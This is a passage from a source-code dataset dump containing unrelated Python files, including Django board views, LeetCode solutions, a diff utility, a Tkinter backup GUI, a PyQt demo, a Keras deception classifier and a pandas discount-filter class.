PostLV(ListView):\r\n model = Board\r\n template_name = \"staff/board_list.html\"\r\n context_object_name = 'posts'\r\n paginate_by = 5\r\n posts = Board.objects.all()\r\n\r\n # Add the category list\r\n def get_context_data(self, **kwargs):\r\n context = super(PostLV, self).get_context_data(**kwargs)\r\n categories = Category.objects.all()\r\n context['categories'] = categories\r\n return context\r\n\r\n\r\n# Notice detail\r\n# class PostDV(DetailView):\r\n# model = Board\r\n# template_name = \"staff/board_detail.html\"\r\n# paginate_by = 2\r\n# context_object_name = 'post'\r\n\r\n# View count by IP address\r\ndef post_ip(request, pk):\r\n post = get_object_or_404(Board, pk=pk)\r\n # posts = Board.objects.all()\r\n ip = client_ip(request)\r\n\r\n try:\r\n # Look up the hit record by IP address and post id\r\n hits = HitCount.objects.get(ip=ip, post=post)\r\n except Exception as e:\r\n # No hit record exists the first time the post is viewed\r\n print(e)\r\n hits = HitCount.objects.create(ip=ip, post_id=post.id)\r\n Board.objects.filter(pk=pk).update(hits=post.hits + 1)\r\n hits.save()\r\n # The view count on the detail screen does not update immediately, so force the displayed count up by one
바뀌지 않아서 강제로 출력 조회수 +1 시킴\r\n post.hits = post.hits + 1\r\n else:\r\n # 조회 기록은 있으나, 날짜가 다른 경우\r\n if not hits.date == timezone.now().date():\r\n # 테스트할 때 사용\r\n # if not hits.date == timezone.now():\r\n Board.objects.filter(pk=pk).update(hits=post.hits + 1)\r\n hits.date = timezone.now()\r\n hits.save()\r\n post.hits = post.hits+1\r\n # 날짜가 같은 경우\r\n else:\r\n print(str(ip) + ' has already hit this post.\\n\\n')\r\n return render(request, 'staff/board_detail.html', {'post': post})\r\n\r\n\r\n# def post_detail(request, pk):\r\n# post = get_object_or_404(Board, pk=pk)\r\n# return render(request, 'staff/board_detail.html',{'post':post})\r\n\r\n# 공지사항 수정\r\ndef post_edit(request, pk):\r\n post = get_object_or_404(Board, pk=pk)\r\n if request.method == \"POST\":\r\n form = BoardForm(request.POST, instance=post)\r\n if form.is_valid():\r\n post = form.save(commit=False)\r\n post.user = request.user\r\n post.save()\r\n return redirect('staff:board_detail', pk=post.pk)\r\n else:\r\n form = BoardForm(instance=post)\r\n return render(request, 'staff/board_edit.html', {'form': form})\r\n\r\n\r\n# 공지사항 삭제\r\ndef post_remove(request, pk):\r\n post = get_object_or_404(Board, pk=pk)\r\n post.delete()\r\n return redirect('staff:board_list')\r\n\r\n\r\n# 카테고리 필터링\r\ndef post_filter(request, pk):\r\n posts = Board.objects.filter(category_id=pk)\r\n categories = Category.objects.all()\r\n return render(request, 'staff/board_list.html', {'posts': posts, 'categories': categories})\r\n\r\n\r\n# QnA 두번째 게시판\r\ndef qnaView(request):\r\n advertisings = Advertising.objects.all().order_by('?')\r\n advertising1 = advertisings[0]\r\n advertising2 = advertisings[1]\r\n qnas = QnA.objects.all()\r\n # 6.2 소이 - 페이지네이션\r\n paginator = Paginator(qnas, 5)\r\n\r\n page = request.GET.get('page')\r\n try:\r\n qnas = paginator.page(page)\r\n except PageNotAnInteger:\r\n # If page is not an integer, deliver first page.\r\n qnas = paginator.page(1)\r\n except EmptyPage:\r\n # If page is out of range (e.g. 
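# Editor's sketch: Django's get_or_create collapses the try/except-on-lookup
# pattern used in post_ip above into one call; field names follow the HitCount
# model as it is used there, and the date handling mirrors the original.
def register_hit(request, post):
    ip = client_ip(request)
    hit, created = HitCount.objects.get_or_create(ip=ip, post=post)
    if created or hit.date != timezone.now().date():
        Board.objects.filter(pk=post.pk).update(hits=post.hits + 1)
        hit.date = timezone.now()
        hit.save()
        post.hits = post.hits + 1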
9999), deliver last page of results.\r\n qnas = paginator.page(paginator.num_pages)\r\n\r\n return render(request, 'staff/QnA.html', {'qnas': qnas, 'advertising1':advertising1, 'advertising2':advertising2})\r\n\r\n\r\n# QnA 삭제\r\ndef qna_remove(request, pk):\r\n qna = get_object_or_404(QnA, pk=pk)\r\n qna.delete()\r\n return redirect('staff:qna')\r\n\r\n\r\n# 질문 수정\r\ndef q_edit(request, pk):\r\n qna = get_object_or_404(QnA, pk=pk)\r\n if request.method == \"POST\":\r\n form = QForm(request.POST, instance=qna)\r\n if form.is_valid():\r\n qna = form.save(commit=False)\r\n qna.user = request.user\r\n qna.save()\r\n return redirect('staff:qna')\r\n else:\r\n form = QForm(instance=qna)\r\n return render(request, 'staff/QnA.html', {'qform': form})\r\n\r\n\r\n# 답변 수정\r\ndef a_edit(request, pk):\r\n qna = get_object_or_404(QnA, pk=pk)\r\n if request.method == \"POST\":\r\n form = AForm(request.POST, instance=qna)\r\n if form.is_valid():\r\n qna = form.save(commit=False)\r\n qna.user = request.user\r\n qna.save()\r\n return redirect('staff:qna')\r\n else:\r\n form = AForm(instance=qna)\r\n return render(request, 'staff/QnA.html', {'aform': form})\r\n\r\n\r\n# 질문쓰기\r\ndef q_new(request):\r\n if request.method == \"POST\":\r\n form = QForm(request.POST)\r\n if form.is_valid():\r\n qna = form.save(commit=False)\r\n qna.user = request.user\r\n qna.date = timezone.now()\r\n qna.save()\r\n return redirect('staff:qna')\r\n else:\r\n form = QForm()\r\n return render(request, 'staff/QnA.html', {'qform': form})\r\n\r\n\r\n# 응모권 190820 예림\r\ndef ticket(request, pk):\r\n advertisings = Advertising.objects.all().order_by('?')\r\n advertising1 = advertisings[0]\r\n advertising2 = advertisings[1]\r\n tickets = Ticket.objects.all()\r\n user = User.objects.get(id=pk)\r\n user_ticket = user.ticket\r\n if request.method == \"POST\" and 'ticketing' in request.POST:\r\n user.ticket = user.ticket-1\r\n user.ticketing = user.ticketing+1\r\n user.save()\r\n return redirect('staff:ticket', pk=pk)\r\n return render(request, 'staff/ticket.html', {'tickets':tickets, 'user_ticket':user_ticket, 'pk':pk,\r\n 'advertising1':advertising1, 'advertising2':advertising2})\r\n\r\n","sub_path":"staff/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"115723737","text":"\"\"\"\n77. Combinations\n\nGiven two integers n and k, return all possible combinations of k numbers out of 1 ... 
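# Editor's aside (sketch): on Django >= 2.0, Paginator.get_page performs the
# PageNotAnInteger/EmptyPage handling written out in qnaView above in one call,
# clamping bad or out-of-range page numbers itself.
paginator = Paginator(qnas, 5)
qnas = paginator.get_page(request.GET.get('page'))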
n.\n\nFor example,\nIf n = 4 and k = 2, a solution is:\n\n[\n [2,4],\n [3,4],\n [2,3],\n [1,2],\n [1,3],\n [1,4],\n]\n\"\"\"\n\nclass Solution(object):\n def combine(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: List[List[int]]\n \"\"\"\n def dfs(n, k, start_number, path, result):\n if len(path) == k:\n result.append(path)\n return\n for number in range(start_number, n):\n dfs(n, k, number + 1, path + [number + 1], result)\n\n result = []\n dfs(n, k, 0, [], result)\n return result\n\n","sub_path":"python/77.py","file_name":"77.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"416546200","text":"#!/usr/bin/python\n# Line-by-line diff comparison\n\nfrom __future__ import print_function\nfrom collections import namedtuple\nfrom string_utils import differences\n\nimport sys\nimport optparse\nimport os\n\n\ntotal_diff = namedtuple('total_diff', ['distance', 'edits', 'removals', 'additions', 'differences'])\n\n\nclass ImmutableList:\n \"\"\"Immutable list object with fundamental operations\n being cons in O(1), as well as unpacking in O(1)\"\"\"\n\n\n def __init__(self, val=None, tl=()):\n if val == None:\n self.ls = tl\n else:\n self.ls = (val, tl)\n\n def head(self):\n val, tail = self.ls\n return val\n\n def tail(self):\n val, tail = self.ls\n return tail\n\n def cons(self, val):\n return ImmutableList(val, self.ls)\n\n def unpack(self):\n return self.ls\n\n def empty(self):\n return self.ls == ()\n\n def to_list(self):\n cp = []\n ls = self.ls\n while ls != ():\n hd, tl = ls\n cp.append(hd)\n ls = tl\n return cp\n\n # Make py3 happy\n def __le__(self, other):\n return self.ls <= other.ls\n\n\ndef _strindex(len, i):\n return len - i\n\ndef diff(a, b):\n table = {(0, 0): total_diff(0, 0, ImmutableList(), ImmutableList(), ImmutableList())}\n\n m = len(a)\n n = len(b)\n for i in range(1, m + 1):\n diff = table[i - 1, 0]\n\n diff2 = total_diff(diff.distance + 1, 0,\n diff.removals.cons((_strindex(m, i), _strindex(n, 0))),\n diff.additions,\n diff.differences)\n table[i, 0] = diff2\n for i in range(1, n + 1):\n diff = table[0, i - 1]\n\n diff2 = total_diff(diff.distance + 1, 0, diff.removals,\n diff.additions.cons((_strindex(m, 0), _strindex(n, i))),\n diff.differences)\n table[0, i] = diff2\n\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if a[_strindex(m, i)] == b[_strindex(n, j)]:\n table[i, j] = table[i - 1, j - 1]\n else:\n inst = table[i, j - 1]\n delt = table[i - 1, j]\n subs = table[i - 1, j - 1]\n\n if delt <= inst and delt <= subs:\n ln = (_strindex(m, i), _strindex(n, j))\n d = total_diff(delt.distance + 1, delt.edits,\n delt.removals.cons(ln), delt.additions, delt.differences)\n elif inst <= delt and inst <= subs:\n ln = (_strindex(m, i), _strindex(n, j))\n d = total_diff(inst.distance + 1, inst.edits,\n inst.removals, inst.additions.cons(ln), inst.differences)\n else:\n ln = (_strindex(m, i), _strindex(n, j))\n d = total_diff(subs.distance + 1,\n subs.edits + len(differences(a[_strindex(m, i)], b[_strindex(n, j)])[0]),\n subs.removals, subs.additions,\n subs.differences.cons(ln))\n\n\n table[i, j] = d\n\n\n diff = table[m, n]\n return total_diff(diff.distance, diff.edits,\n diff.removals.to_list(),\n diff.additions.to_list(),\n diff.differences.to_list())\n\n\ndef colored(s, color='', ignore=False):\n colors = {\n 'r': '\\033[91m',\n 'g': '\\033[92m',\n 'y': '\\033[93m',\n 'c': '\\033[96m',\n 'p': '\\033[95m',\n 'end': '\\033[0m'\n }\n\n if color in colors and 
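# Editor's sanity check (illustrative): the DFS in Solution.combine above
# should agree with itertools.combinations for small inputs.
from itertools import combinations

expected = {c for c in combinations(range(1, 5), 2)}
actual = {tuple(c) for c in Solution().combine(4, 2)}
assert actual == expected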
not ignore:\n return colors[color] + s + colors['end']\n return s\n\ndef color_line_diff(a, b):\n adiffs, bdiffs = differences(a, b)\n\n x = \"\"\n for i in range(len(a)):\n if i in adiffs:\n x += colored(a[i], 'g')\n else:\n x += a[i]\n y = \"\"\n for i in range(len(b)):\n if i in bdiffs:\n y += colored(b[i], 'r')\n else:\n y += b[i]\n\n return (x, y)\n\ndef star_line_diff(a, b):\n adiffs, bdiffs = differences(a, b)\n\n x = \"\"\n for i in range(len(a)):\n if i in adiffs:\n x += '^'\n else:\n x += ' '\n y = \"\"\n for i in range(len(b)):\n if i in bdiffs:\n y += '^'\n else:\n y += ' '\n\n return (x, y)\n\n\ndef space_pad_right(s, len_is, len_want):\n if len_is < len_want:\n return s + ' ' * (len_want - len_is)\n return s\ndef print_diff(a, b, colors=False, lines=True, eqs=True):\n _, _, removals, additions, diffs = diff(a, b)\n i = 0\n j = 0\n length = str(len(max(a + b, key=len)))\n\n while i < len(a) or j < len(b):\n i\n if (i, j) in diffs:\n if lines:\n print('%3d,%3d: ' % (i + 1, j + 1), end='')\n if colors:\n x, y = color_line_diff(a[i], b[j])\n x = space_pad_right(x, len(a[i]), int(length))\n print((\" | %-\" + length + \"s\\t%-\" + length + \"s\") % (x, y))\n else:\n x, y = star_line_diff(a[i], b[j])\n print((\" | %-\" + length + \"s\\t%-\" + length + \"s\") % (a[i], b[j]))\n if lines:\n l = max(3, max(len(str(i + 1)), len(str(j + 1))))\n spaces = (3 + 2 * l) * ' '\n print(spaces, end='')\n print((' %-' + length + 's\\t%s') % (x, y))\n\n i += 1\n j += 1\n elif (i, j) in additions:\n if lines:\n print('%3d,%3d: ' % (i + 1, j + 1), end='')\n if eqs:\n print((\" + %-\" + length + \"s\\t%-\" + length + \"s\") % (' ', colored(b[j], 'p', not colors)))\n else:\n print((\" + %-\" + length + \"s\") % colored(b[j], 'p', not colors))\n j += 1\n elif (i, j) in removals:\n if lines:\n print('%3d,%3d: ' % (i + 1, j + 1), end='')\n if eqs:\n print((\" - %-\" + length + \"s\\t%-\" + length + \"s\") % (colored(a[i], 'y', not colors), ' '))\n else:\n print((\" - %-\" + length + \"s\") % colored(a[i], 'y', not colors))\n i += 1\n else:\n if eqs:\n if lines:\n print('%3d,%3d: ' % (i + 1, j + 1), end='')\n print((\" = %-\" + length + \"s\\t%-\" + length + \"s\") % (a[i], b[j]))\n i += 1\n j += 1\n\n\ndef is_windows():\n return os.name == 'nt'\n\n\nif __name__ == '__main__':\n parser = optparse.OptionParser(\n usage=\"usage: %prog [options] fileA fileB\",\n description='Side-by side diff program. Takes two input files for arguments, prints their differences ' +\n 'side by side to stdout.\\n\\n Each line contains a character to determine equality or differences.\\n'\n '= means the lines are equivalent, | means a line-difference. 
+/- signify missing or added lines.')\n parser.add_option('-n', '--nocolor', action='store_true',\n help='turns off color coding (automatically done for files/Windows)\\n'\n + 'prints ^ characters for differences instead')\n\n parser.add_option('-L', '--lines', action='store_true',\n help='prints line numbers as well')\n parser.add_option('-E', '--noequals', action='store_true',\n help='does not print lines that are equal')\n\n (opts, args) = parser.parse_args()\n if len(args) != 2:\n print('Usage: see python diff.py --help')\n exit(1)\n\n colors = not opts.nocolor\n if is_windows() or not sys.stdout.isatty():\n colors = False\n\n a = open(args[0]).readlines()\n b = open(args[1]).readlines()\n a = list(map(lambda x: x[:-1] if x.endswith('\\n') else x, a))\n b = list(map(lambda x: x[:-1] if x.endswith('\\n') else x, b))\n print_diff(a, b, colors, opts.lines, not opts.noequals)\n","sub_path":"diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":7946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"154022480","text":"import os \nimport time\nimport tkinter\n\n#函数主体\ndef BackUP():\n global enter_source_dir\n global enter_target_dir\n source_dir = enter_source_dir.get() # get()函数读到该控件的文本框信息\n target_dir=enter_target_dir.gets()\n\n today_dir=target_dir+time.strftime('%Y%m%d')\n #os.sep:根据系统的不同,os.sep也不同,在Linux和Mac下(也可以说是Unix和类Unix系统中),\n #os.sep的值为'/',而在Windows系统中,os.sep的值为'\\'。\n zip_file=today_dir+os.sep+time.strftime('%H%M%S')+'.zip'\n\n zip_command=\"zip -qr \"+zip_file+' '+source_dir\n\n if os.path.exists(today_dir)==0:\n os.mkdir(today_dir)\n if os.system(zip_command)==0: #执行压缩命令,执行成功返回0;\n print(\"zip Successful!\")\n else:\n print(\"error!!\")\n\n\n#Tk界面控件\nroot=tkinter.Tk()\nroot.title(\"BackUp\") \nroot.geometry(\"200x200\") #设定界面大小,不是*\n#第一行的控件\nlb1_source=tkinter.Label(root,text='Source') #第一行文本\nlb1_source.grid(row=0,column=0)\nenter_source_dir=tkinter.Entry(root) #第一行输入框控件\nenter_source_dir.grid(row=0,column=1)\n#第二行的控件\nlb1_target = tkinter.Label(root, text='Target') # 第二行文本\nlb1_target.grid(row=1, column=0)\nenter_target_dir = tkinter.Entry(root) # 第二行输入框控件\nenter_target_dir.grid(row=1, column=1)\n#第三行控件,一个按钮\nrun_backup = tkinter.Button(root, text=\"BackUp\")\nrun_backup.grid(row=3,column=0)\nrun_backup['command'] = BackUP # 将命令绑定在backup()函数上,当点击这个按钮时,就调用指定的backup()函数\n#界面开始\nroot.mainloop()\n","sub_path":"Project/File-BackUp/File-BackUp.py","file_name":"File-BackUp.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"544045412","text":"#!/usr/bin/env python -tt\n# -*- coding: utf-8 -*-\n# from PySide.QtGui import *\nimport sys\n\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\n# reload(sys)\n# sys.setdefaultencoding('utf8')\n\ndata_for_tree = {\"tomato\": {\"color\": \"red\", \"ammount\": \"10\", \"note\": \"a note for tomato\", \"price\": \"0.8\"},\n \"banana\": {\"color\": \"yellow\", \"ammount\": \"1\", \"note\": \"b note for banana\", \"price\": \".6\"},\n \"some fruit\": {\"color\": \"unknown\", \"ammount\": \"100\", \"note\": \"some text\", \"price\": \"2.1\"}}\ndata_for_receiver = {\"1\": {\"name\": \"milk\", \"price\": \"3.2\", \"note\": \"I love milk\"},\n \"2\": {\"name\": \"coca-cola\", \"price\": \".8\", \"note\": \"coke forever\"}}\n\n\nclass ProxyModel(QSortFilterProxyModel):\n\n def __init__(self, parent=None):\n super(ProxyModel, self).__init__(parent)\n\n 
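# Editor's sketch: the File-BackUp record above shells out to `zip` via
# os.system (and its enter_target_dir.gets() call would raise AttributeError --
# Tkinter's Entry exposes get()). shutil.make_archive keeps the backup in pure
# Python with no external binary:
import os, time, shutil

def backup(source_dir, target_dir):
    today_dir = os.path.join(target_dir, time.strftime('%Y%m%d'))
    os.makedirs(today_dir, exist_ok=True)
    base = os.path.join(today_dir, time.strftime('%H%M%S'))
    return shutil.make_archive(base, 'zip', source_dir)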
def lessThan(self, left, right):\n leftData = self.sourceModel().data(left)\n rightData = self.sourceModel().data(right)\n try:\n return float(leftData) < float(rightData)\n except ValueError:\n return leftData < rightData\n\n\nclass MainFrame(QWidget):\n def __init__(self):\n QWidget.__init__(self)\n\n self.MyTreeView = QTreeView()\n self.MyTreeViewModel = QStandardItemModel()\n self.MyTreeView.setModel(self.MyTreeViewModel)\n self.most_used_cat_header = ['Name', \"ammount\", \"color\"]\n self.MyTreeViewModel.setHorizontalHeaderLabels(self.most_used_cat_header)\n self.MyTreeView.setSortingEnabled(True)\n\n self.MyTreeView_Fill()\n\n self.receiver_tree = QTreeView()\n self.receiver_model = QStandardItemModel()\n self.receiver_tree.setModel(self.receiver_model)\n self.receiver_tree_header = ['#', 'Name', \"price\"]\n self.receiver_model.setHorizontalHeaderLabels(self.receiver_tree_header)\n\n self.MyTreeView.doubleClicked.connect(self.addToReceiver)\n\n self.receiver_fill()\n\n MainWindow = QHBoxLayout(self)\n MainWindow.addWidget(self.MyTreeView)\n MainWindow.addWidget(self.receiver_tree)\n self.setLayout(MainWindow)\n\n def addToReceiver(self):\n indexes = self.MyTreeView.selectedIndexes()\n index_list = [i.data() for i in self.MyTreeView.selectedIndexes()]\n last_id = max(int(i) for i in data_for_receiver)\n for k in data_for_tree:\n v = data_for_tree[k]\n if [k, v[\"ammount\"], v[\"color\"]] == index_list:\n i = QStandardItem(str(last_id + 1))\n name = QStandardItem(k)\n price = QStandardItem(format(float(v[\"price\"]), \".2f\"))\n tooltip = v[\"note\"]\n name.setToolTip(tooltip)\n item = (i, name, price)\n self.receiver_model.appendRow(item)\n upd = {\"name\": k, \"price\": v[\"price\"], \"note\": v[\"note\"]}\n data_for_receiver[str(last_id + 1)] = upd\n\n def MyTreeView_Fill(self):\n for k in data_for_tree:\n name = QStandardItem(k)\n ammount = QStandardItem(data_for_tree[k][\"ammount\"])\n note = QStandardItem(data_for_tree[k][\"color\"])\n name.setEditable(False)\n tooltip = \"price \" + format(float(data_for_tree[k][\"price\"]), \".2f\") + \"
\"\n tooltip += data_for_tree[k][\"note\"]\n item = (name, ammount, note)\n name.setToolTip(tooltip)\n\n self.MyTreeViewModel.appendRow(item)\n self.MyTreeView.sortByColumn(1, Qt.DescendingOrder)\n proxyModel = ProxyModel(self)\n proxyModel.setSourceModel(self.MyTreeViewModel)\n self.MyTreeView.setModel(proxyModel)\n\n c = 0\n while c < len(self.most_used_cat_header):\n self.MyTreeView.resizeColumnToContents(c)\n c = c + 1\n\n def receiver_fill(self):\n for k in data_for_receiver:\n v = data_for_receiver[k]\n i = QStandardItem(k)\n name = QStandardItem(v[\"name\"])\n price = QStandardItem(format(float(v[\"price\"]), \".2f\"))\n tooltip = v[\"note\"]\n name.setToolTip(tooltip)\n\n item = (i, name, price)\n self.receiver_model.appendRow(item)\n c = 0\n while c < len(self.receiver_tree_header):\n self.receiver_tree.resizeColumnToContents(c)\n c = c + 1\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n main = MainFrame()\n main.show()\n main.move(app.desktop().screen().rect().center() - main.rect().center())\n sys.exit(app.exec_())\n","sub_path":"References/QTreeview_两课树.py","file_name":"QTreeview_两课树.py","file_ext":"py","file_size_in_byte":4552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"328941305","text":"import re\nimport numpy as np\nfrom scipy.io import wavfile\nfrom sklearn import preprocessing\nfrom python_speech_features import mfcc\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten\nfrom keras.preprocessing import sequence\nfrom keras.layers.embeddings import Embedding\n\ndef load_data():\n\tXtrain = []\n\tytrain = []\n\tXdevel = []\n\tydevel = []\n\twith open('arff/ComParE2016_Deception.ComParE.train.arff') as f:\n\t\tfor line in f.readlines():\n\t\t\tif re.match('\\'', line):\n\t\t\t\tlists = line.split(',')\n\t\t\t\tx = np.array(lists[1: -1])\n\t\t\t\tx = x.reshape(1, x.size)\n\t\t\t\tXtrain.extend(x)\n\t\t\t\tif re.match('D', lists[-1]):\n\t\t\t\t\tytrain.append(1)\n\t\t\t\telse:\n\t\t\t\t\tytrain.append(0)\n\twith open('arff/ComParE2016_Deception.ComParE.devel.arff') as f:\n\t\tfor line in f.readlines():\n\t\t\tif re.match('\\'', line):\n\t\t\t\tlists = line.split(',')\n\t\t\t\tx = np.array(lists[1: -1])\n\t\t\t\tx = x.reshape(1, x.size)\n\t\t\t\tXdevel.extend(x)\n\t\t\t\tif re.match('D', lists[-1]):\n\t\t\t\t\tydevel.append(1)\n\t\t\t\telse:\n\t\t\t\t\tydevel.append(0)\n\treturn np.array(Xtrain), np.array(ytrain), np.array(Xdevel), np.array(ydevel)\n\t\ndef train(Xtrain, ytrain, Xdevel, ydevel, maxword):\n\tmodel = Sequential()\n\tmodel.add(Dense(2048, input_shape = (maxword, ), activation = 'relu'))\n\tmodel.add(Dense(512, activation = 'relu'))\n\tmodel.add(Dense(128, activation = 'relu'))\n\tmodel.add(Dense(32, activation = 'relu'))\n\tmodel.add(Dense(1, activation = 'sigmoid'))\n\tmodel.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics = ['accuracy', 'recall'])\n\tmodel.fit(Xtrain, ytrain, validation_data = (Xdevel, ydevel), epochs = 10, batch_size = 143, verbose = 1, class_weight = 'balanced')\n\treturn model\n\t\ndef test(model, Xtrain, ytrain, Xdevel, ydevel):\n\tprint(model.summary())\n\tscore = model.evaluate(Xtrain, ytrain)\n\tprint(\"Model performance on train dataset\")\n\tprint(score)\n\tprint(\"Model performance on development dataset\")\n\tscore = model.evaluate(Xdevel, ydevel)\n\tprint(score)\n\nXtrain, ytrain, Xdevel, ydevel = load_data()\nscaler = preprocessing.StandardScaler()\nXtrain = scaler.fit_transform(Xtrain)\nXdevel = 
scaler.fit_transform(Xdevel)\nmodel = train(Xtrain, ytrain, Xdevel, ydevel, Xtrain.shape[1])\ntest(model, Xtrain, ytrain, Xdevel, ydevel)\n","sub_path":"dnn_arff.py","file_name":"dnn_arff.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"184479028","text":"# Given a singly linked list, group all odd nodes together followed by the even nodes. Please note here we are\n# talking about the node number and not the value in the nodes.\n#\n# You should try to do it in place. The program should run in O(1) space complexity and O(nodes) time complexity.\n#\n# Example 1:\n#\n# Input: 1->2->3->4->5->NULL\n# Output: 1->3->5->2->4->NULL\n# Example 2:\n#\n# Input: 2->1->3->5->6->4->7->NULL\n# Output: 2->3->6->7->1->5->4->NULL\n# Note:\n#\n# The relative order inside both the even and odd groups should remain as it was in the input.\n# The first node is considered odd, the second node even and so on ...\n\n# Solution:\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def oddEvenList(self, head: ListNode) -> ListNode:\n odd_list = ListNode(0)\n even_list = ListNode(0)\n odd = odd_list\n even = even_list\n c = 1\n while head:\n if c % 2 == 0:\n even_list.next = head\n even_list = even_list.next\n else:\n odd_list.next = head\n odd_list = odd_list.next\n\n head = head.next\n c += 1\n even_list.next = None\n odd_list.next = even.next\n return odd.next\n","sub_path":"week3/Odd Even Linked List.py","file_name":"Odd Even Linked List.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"399200196","text":"\nimport pandas as pd\nimport numpy as np\n# FOR DETAILED DESCRIPTION OF THE CODE SEE THE README FILE\n\nclass Add_columns(): # This class adds extra columns to the data table \n # these extra columns will be helpful in parsing data easily\n def __init__(self,data): # columns are Ids,discount,brand.name,discount_diff\n \n self.data = data\n \n Ids = []\n for mr in range(len(self.data[\"_id\"])):\n Ids.append(self.data[\"_id\"][mr][\"$oid\"])\n self.data[\"Ids\"] = Ids\n \n ty = []\n basket_price = []\n for x in range(len(self.data[\"price\"])):\n y = self.data[\"price\"][x][\"regular_price\"][\"value\"]\n z = self.data[\"price\"][x][\"offer_price\"][\"value\"]\n basket_price.append(self.data[\"price\"][x][\"basket_price\"][\"value\"])\n ty.append((((y-z)/y)*100))\n self.data[\"discount\"] = ty\n \n \n by = []\n for x in range(len(self.data[\"brand\"])):\n y = self.data[\"brand\"][x][\"name\"]\n by.append(y)\n self.data[\"brand.name\"] = by\n \n \n comp_list = []\n under_list = []\n discount1 = []\n for ry in range(len(self.data[\"similar_products\"])):\n one_product = self.data[\"similar_products\"][ry]\n compt_ids = [*one_product[\"website_results\"]]\n comp_dict = {}\n product_comp_discount= []\n product_comp_list= []\n undercut = []\n for v in compt_ids:\n comp_basket = one_product[\"website_results\"][f\"{v}\"][\"meta\"][\"avg_price\"][\"basket\"]\n our_basket = basket_price[ry]\n\n if comp_basket!=0 :\n\n undercut1 = comp_basket-our_basket\n perc = ((undercut1)/our_basket)*100\n product_comp_discount.append(perc)\n product_comp_list.append(v)\n\n for m,n in zip(range(len(product_comp_list)),range(len(product_comp_discount))):\n comp_dict[product_comp_list[m]]=product_comp_discount[n]\n\n\n 
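# Editor's note (sketch, reusing Xtrain/Xdevel from the dnn_arff record above):
# fitting the scaler a second time on the devel split leaks devel statistics;
# the usual pattern fits on train only and reuses those parameters.
scaler = preprocessing.StandardScaler()
Xtrain = scaler.fit_transform(Xtrain)  # fit mean/std on train only
Xdevel = scaler.transform(Xdevel)      # apply the train statistics to devel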
comp_list.append(comp_dict) \n\n self.data[\"discount_diff\"] = comp_list\n\n\nclass Filters(Add_columns): # Filter class is a collectiion of all the filter methods\n \n def __init__(self,data,f1=None,f2=None,f3=None):\n super().__init__(data) \n self.f1 = f1 \n self.f2 = f2\n self.f3 = f3\n \n def discount(self):\n \n discount_list = []\n # returns product ids\n qi = self.f1.index(\"discount\")\n discount_list1 = eval(f\"self.data['_id'][self.data['{self.f1[qi]}']{self.f2[qi]}{self.f3[qi]}]\")\n for i in range(len(discount_list1)):\n\n discount_list.append(discount_list1.values[i]['$oid'])\n\n return discount_list\n\n \n def undercut(self): # This is the filter for expensive_list\n \n te = []\n for xv in range(len(self.data[\"discount_diff\"].values)):\n fg = list(((self.data[\"discount_diff\"].values)[xv].values()))\n for z in fg:\n if z<0 :\n te.append(xv)\n break\n \n discount_list = []\n # returns product ids\n for bv in te:\n discount_list1 = (self.data['Ids'])[bv]\n discount_list.append(discount_list1)\n return discount_list\n \n def brand_name(self):\n brand_list = []\n ui = self.f1.index(\"brand.name\")\n brand_list1 = eval(f\"self.data['_id'][self.data['{self.f1[ui]}']{self.f2[ui]}'{self.f3[ui]}']\")\n for i in range(len(brand_list1)):\n brand_list.append(brand_list1.values[i]['$oid'])\n return brand_list\n \n def competition(self):\n \n competition_list = []\n\n ui = self.f1.index(\"competition\")\n for ni in range(len(self.data[\"discount_diff\"])):\n try:\n self.data[\"discount_diff\"][ni][self.f3[ui]]\n except Exception:\n continue\n\n competition_list1 = self.data[\"_id\"][ni][\"$oid\"]\n competition_list.append(competition_list1)\n\n return competition_list\n \n\n def prod_to_dis(self,list1 = None): # It's a simple method for converting product list \n # to corrosponding dicount on that product\n discount_lis = []\n for mr in list1:\n discount_lis.append(self.data[\"discount\"][self.data[\"Ids\"]==mr].values) \n return discount_lis\n \n def discount_diff(self): \n \n product_id = []\n\n ui = self.f1.index(\"discount_diff\")\n\n for i in range(len(self.data[\"discount_diff\"])):\n \n comp = self.data[\"discount_diff\"][i].values()\n for xv in comp:\n if not eval(f\"xv{self.f2[ui]}{self.f3[ui]}\"):\n continue \n else :\n product_id.append(self.data[\"Ids\"][i])\n\n return product_id \n\n\n\nclass Queries(Filters): # This Class has methods for each Query\n \n def __init__(self,data,f1,f2,f3):\n super().__init__(data,f1,f2,f3)\n \n def discounted_products_list(self):\n \n trio = [\"list1\",\"list2\",\"list3\",\"list4\"]\n the_trio = []\n \n try:\n list1 = set(self.discount()) \n except Exception:\n the_trio.append(\"list1\") \n \n try:\n list2 = set(self.brand_name()) \n except Exception:\n the_trio.append(\"list2\")\n \n try:\n list3 = set(self.competition()) \n except Exception:\n the_trio.append(\"list3\")\n\n try:\n list4 = set(self.discount_diff())\n except Exception:\n the_trio.append(\"list4\")\n \n present = list(set(trio)^set(the_trio)) \n\n x = len(present)\n \n if x==4:\n inter2 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter1 = inter2&(eval(f\"{present[2]}\"))\n inter = inter1&(eval(f\"{present[3]}\"))\n \n if x==3:\n inter1 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter 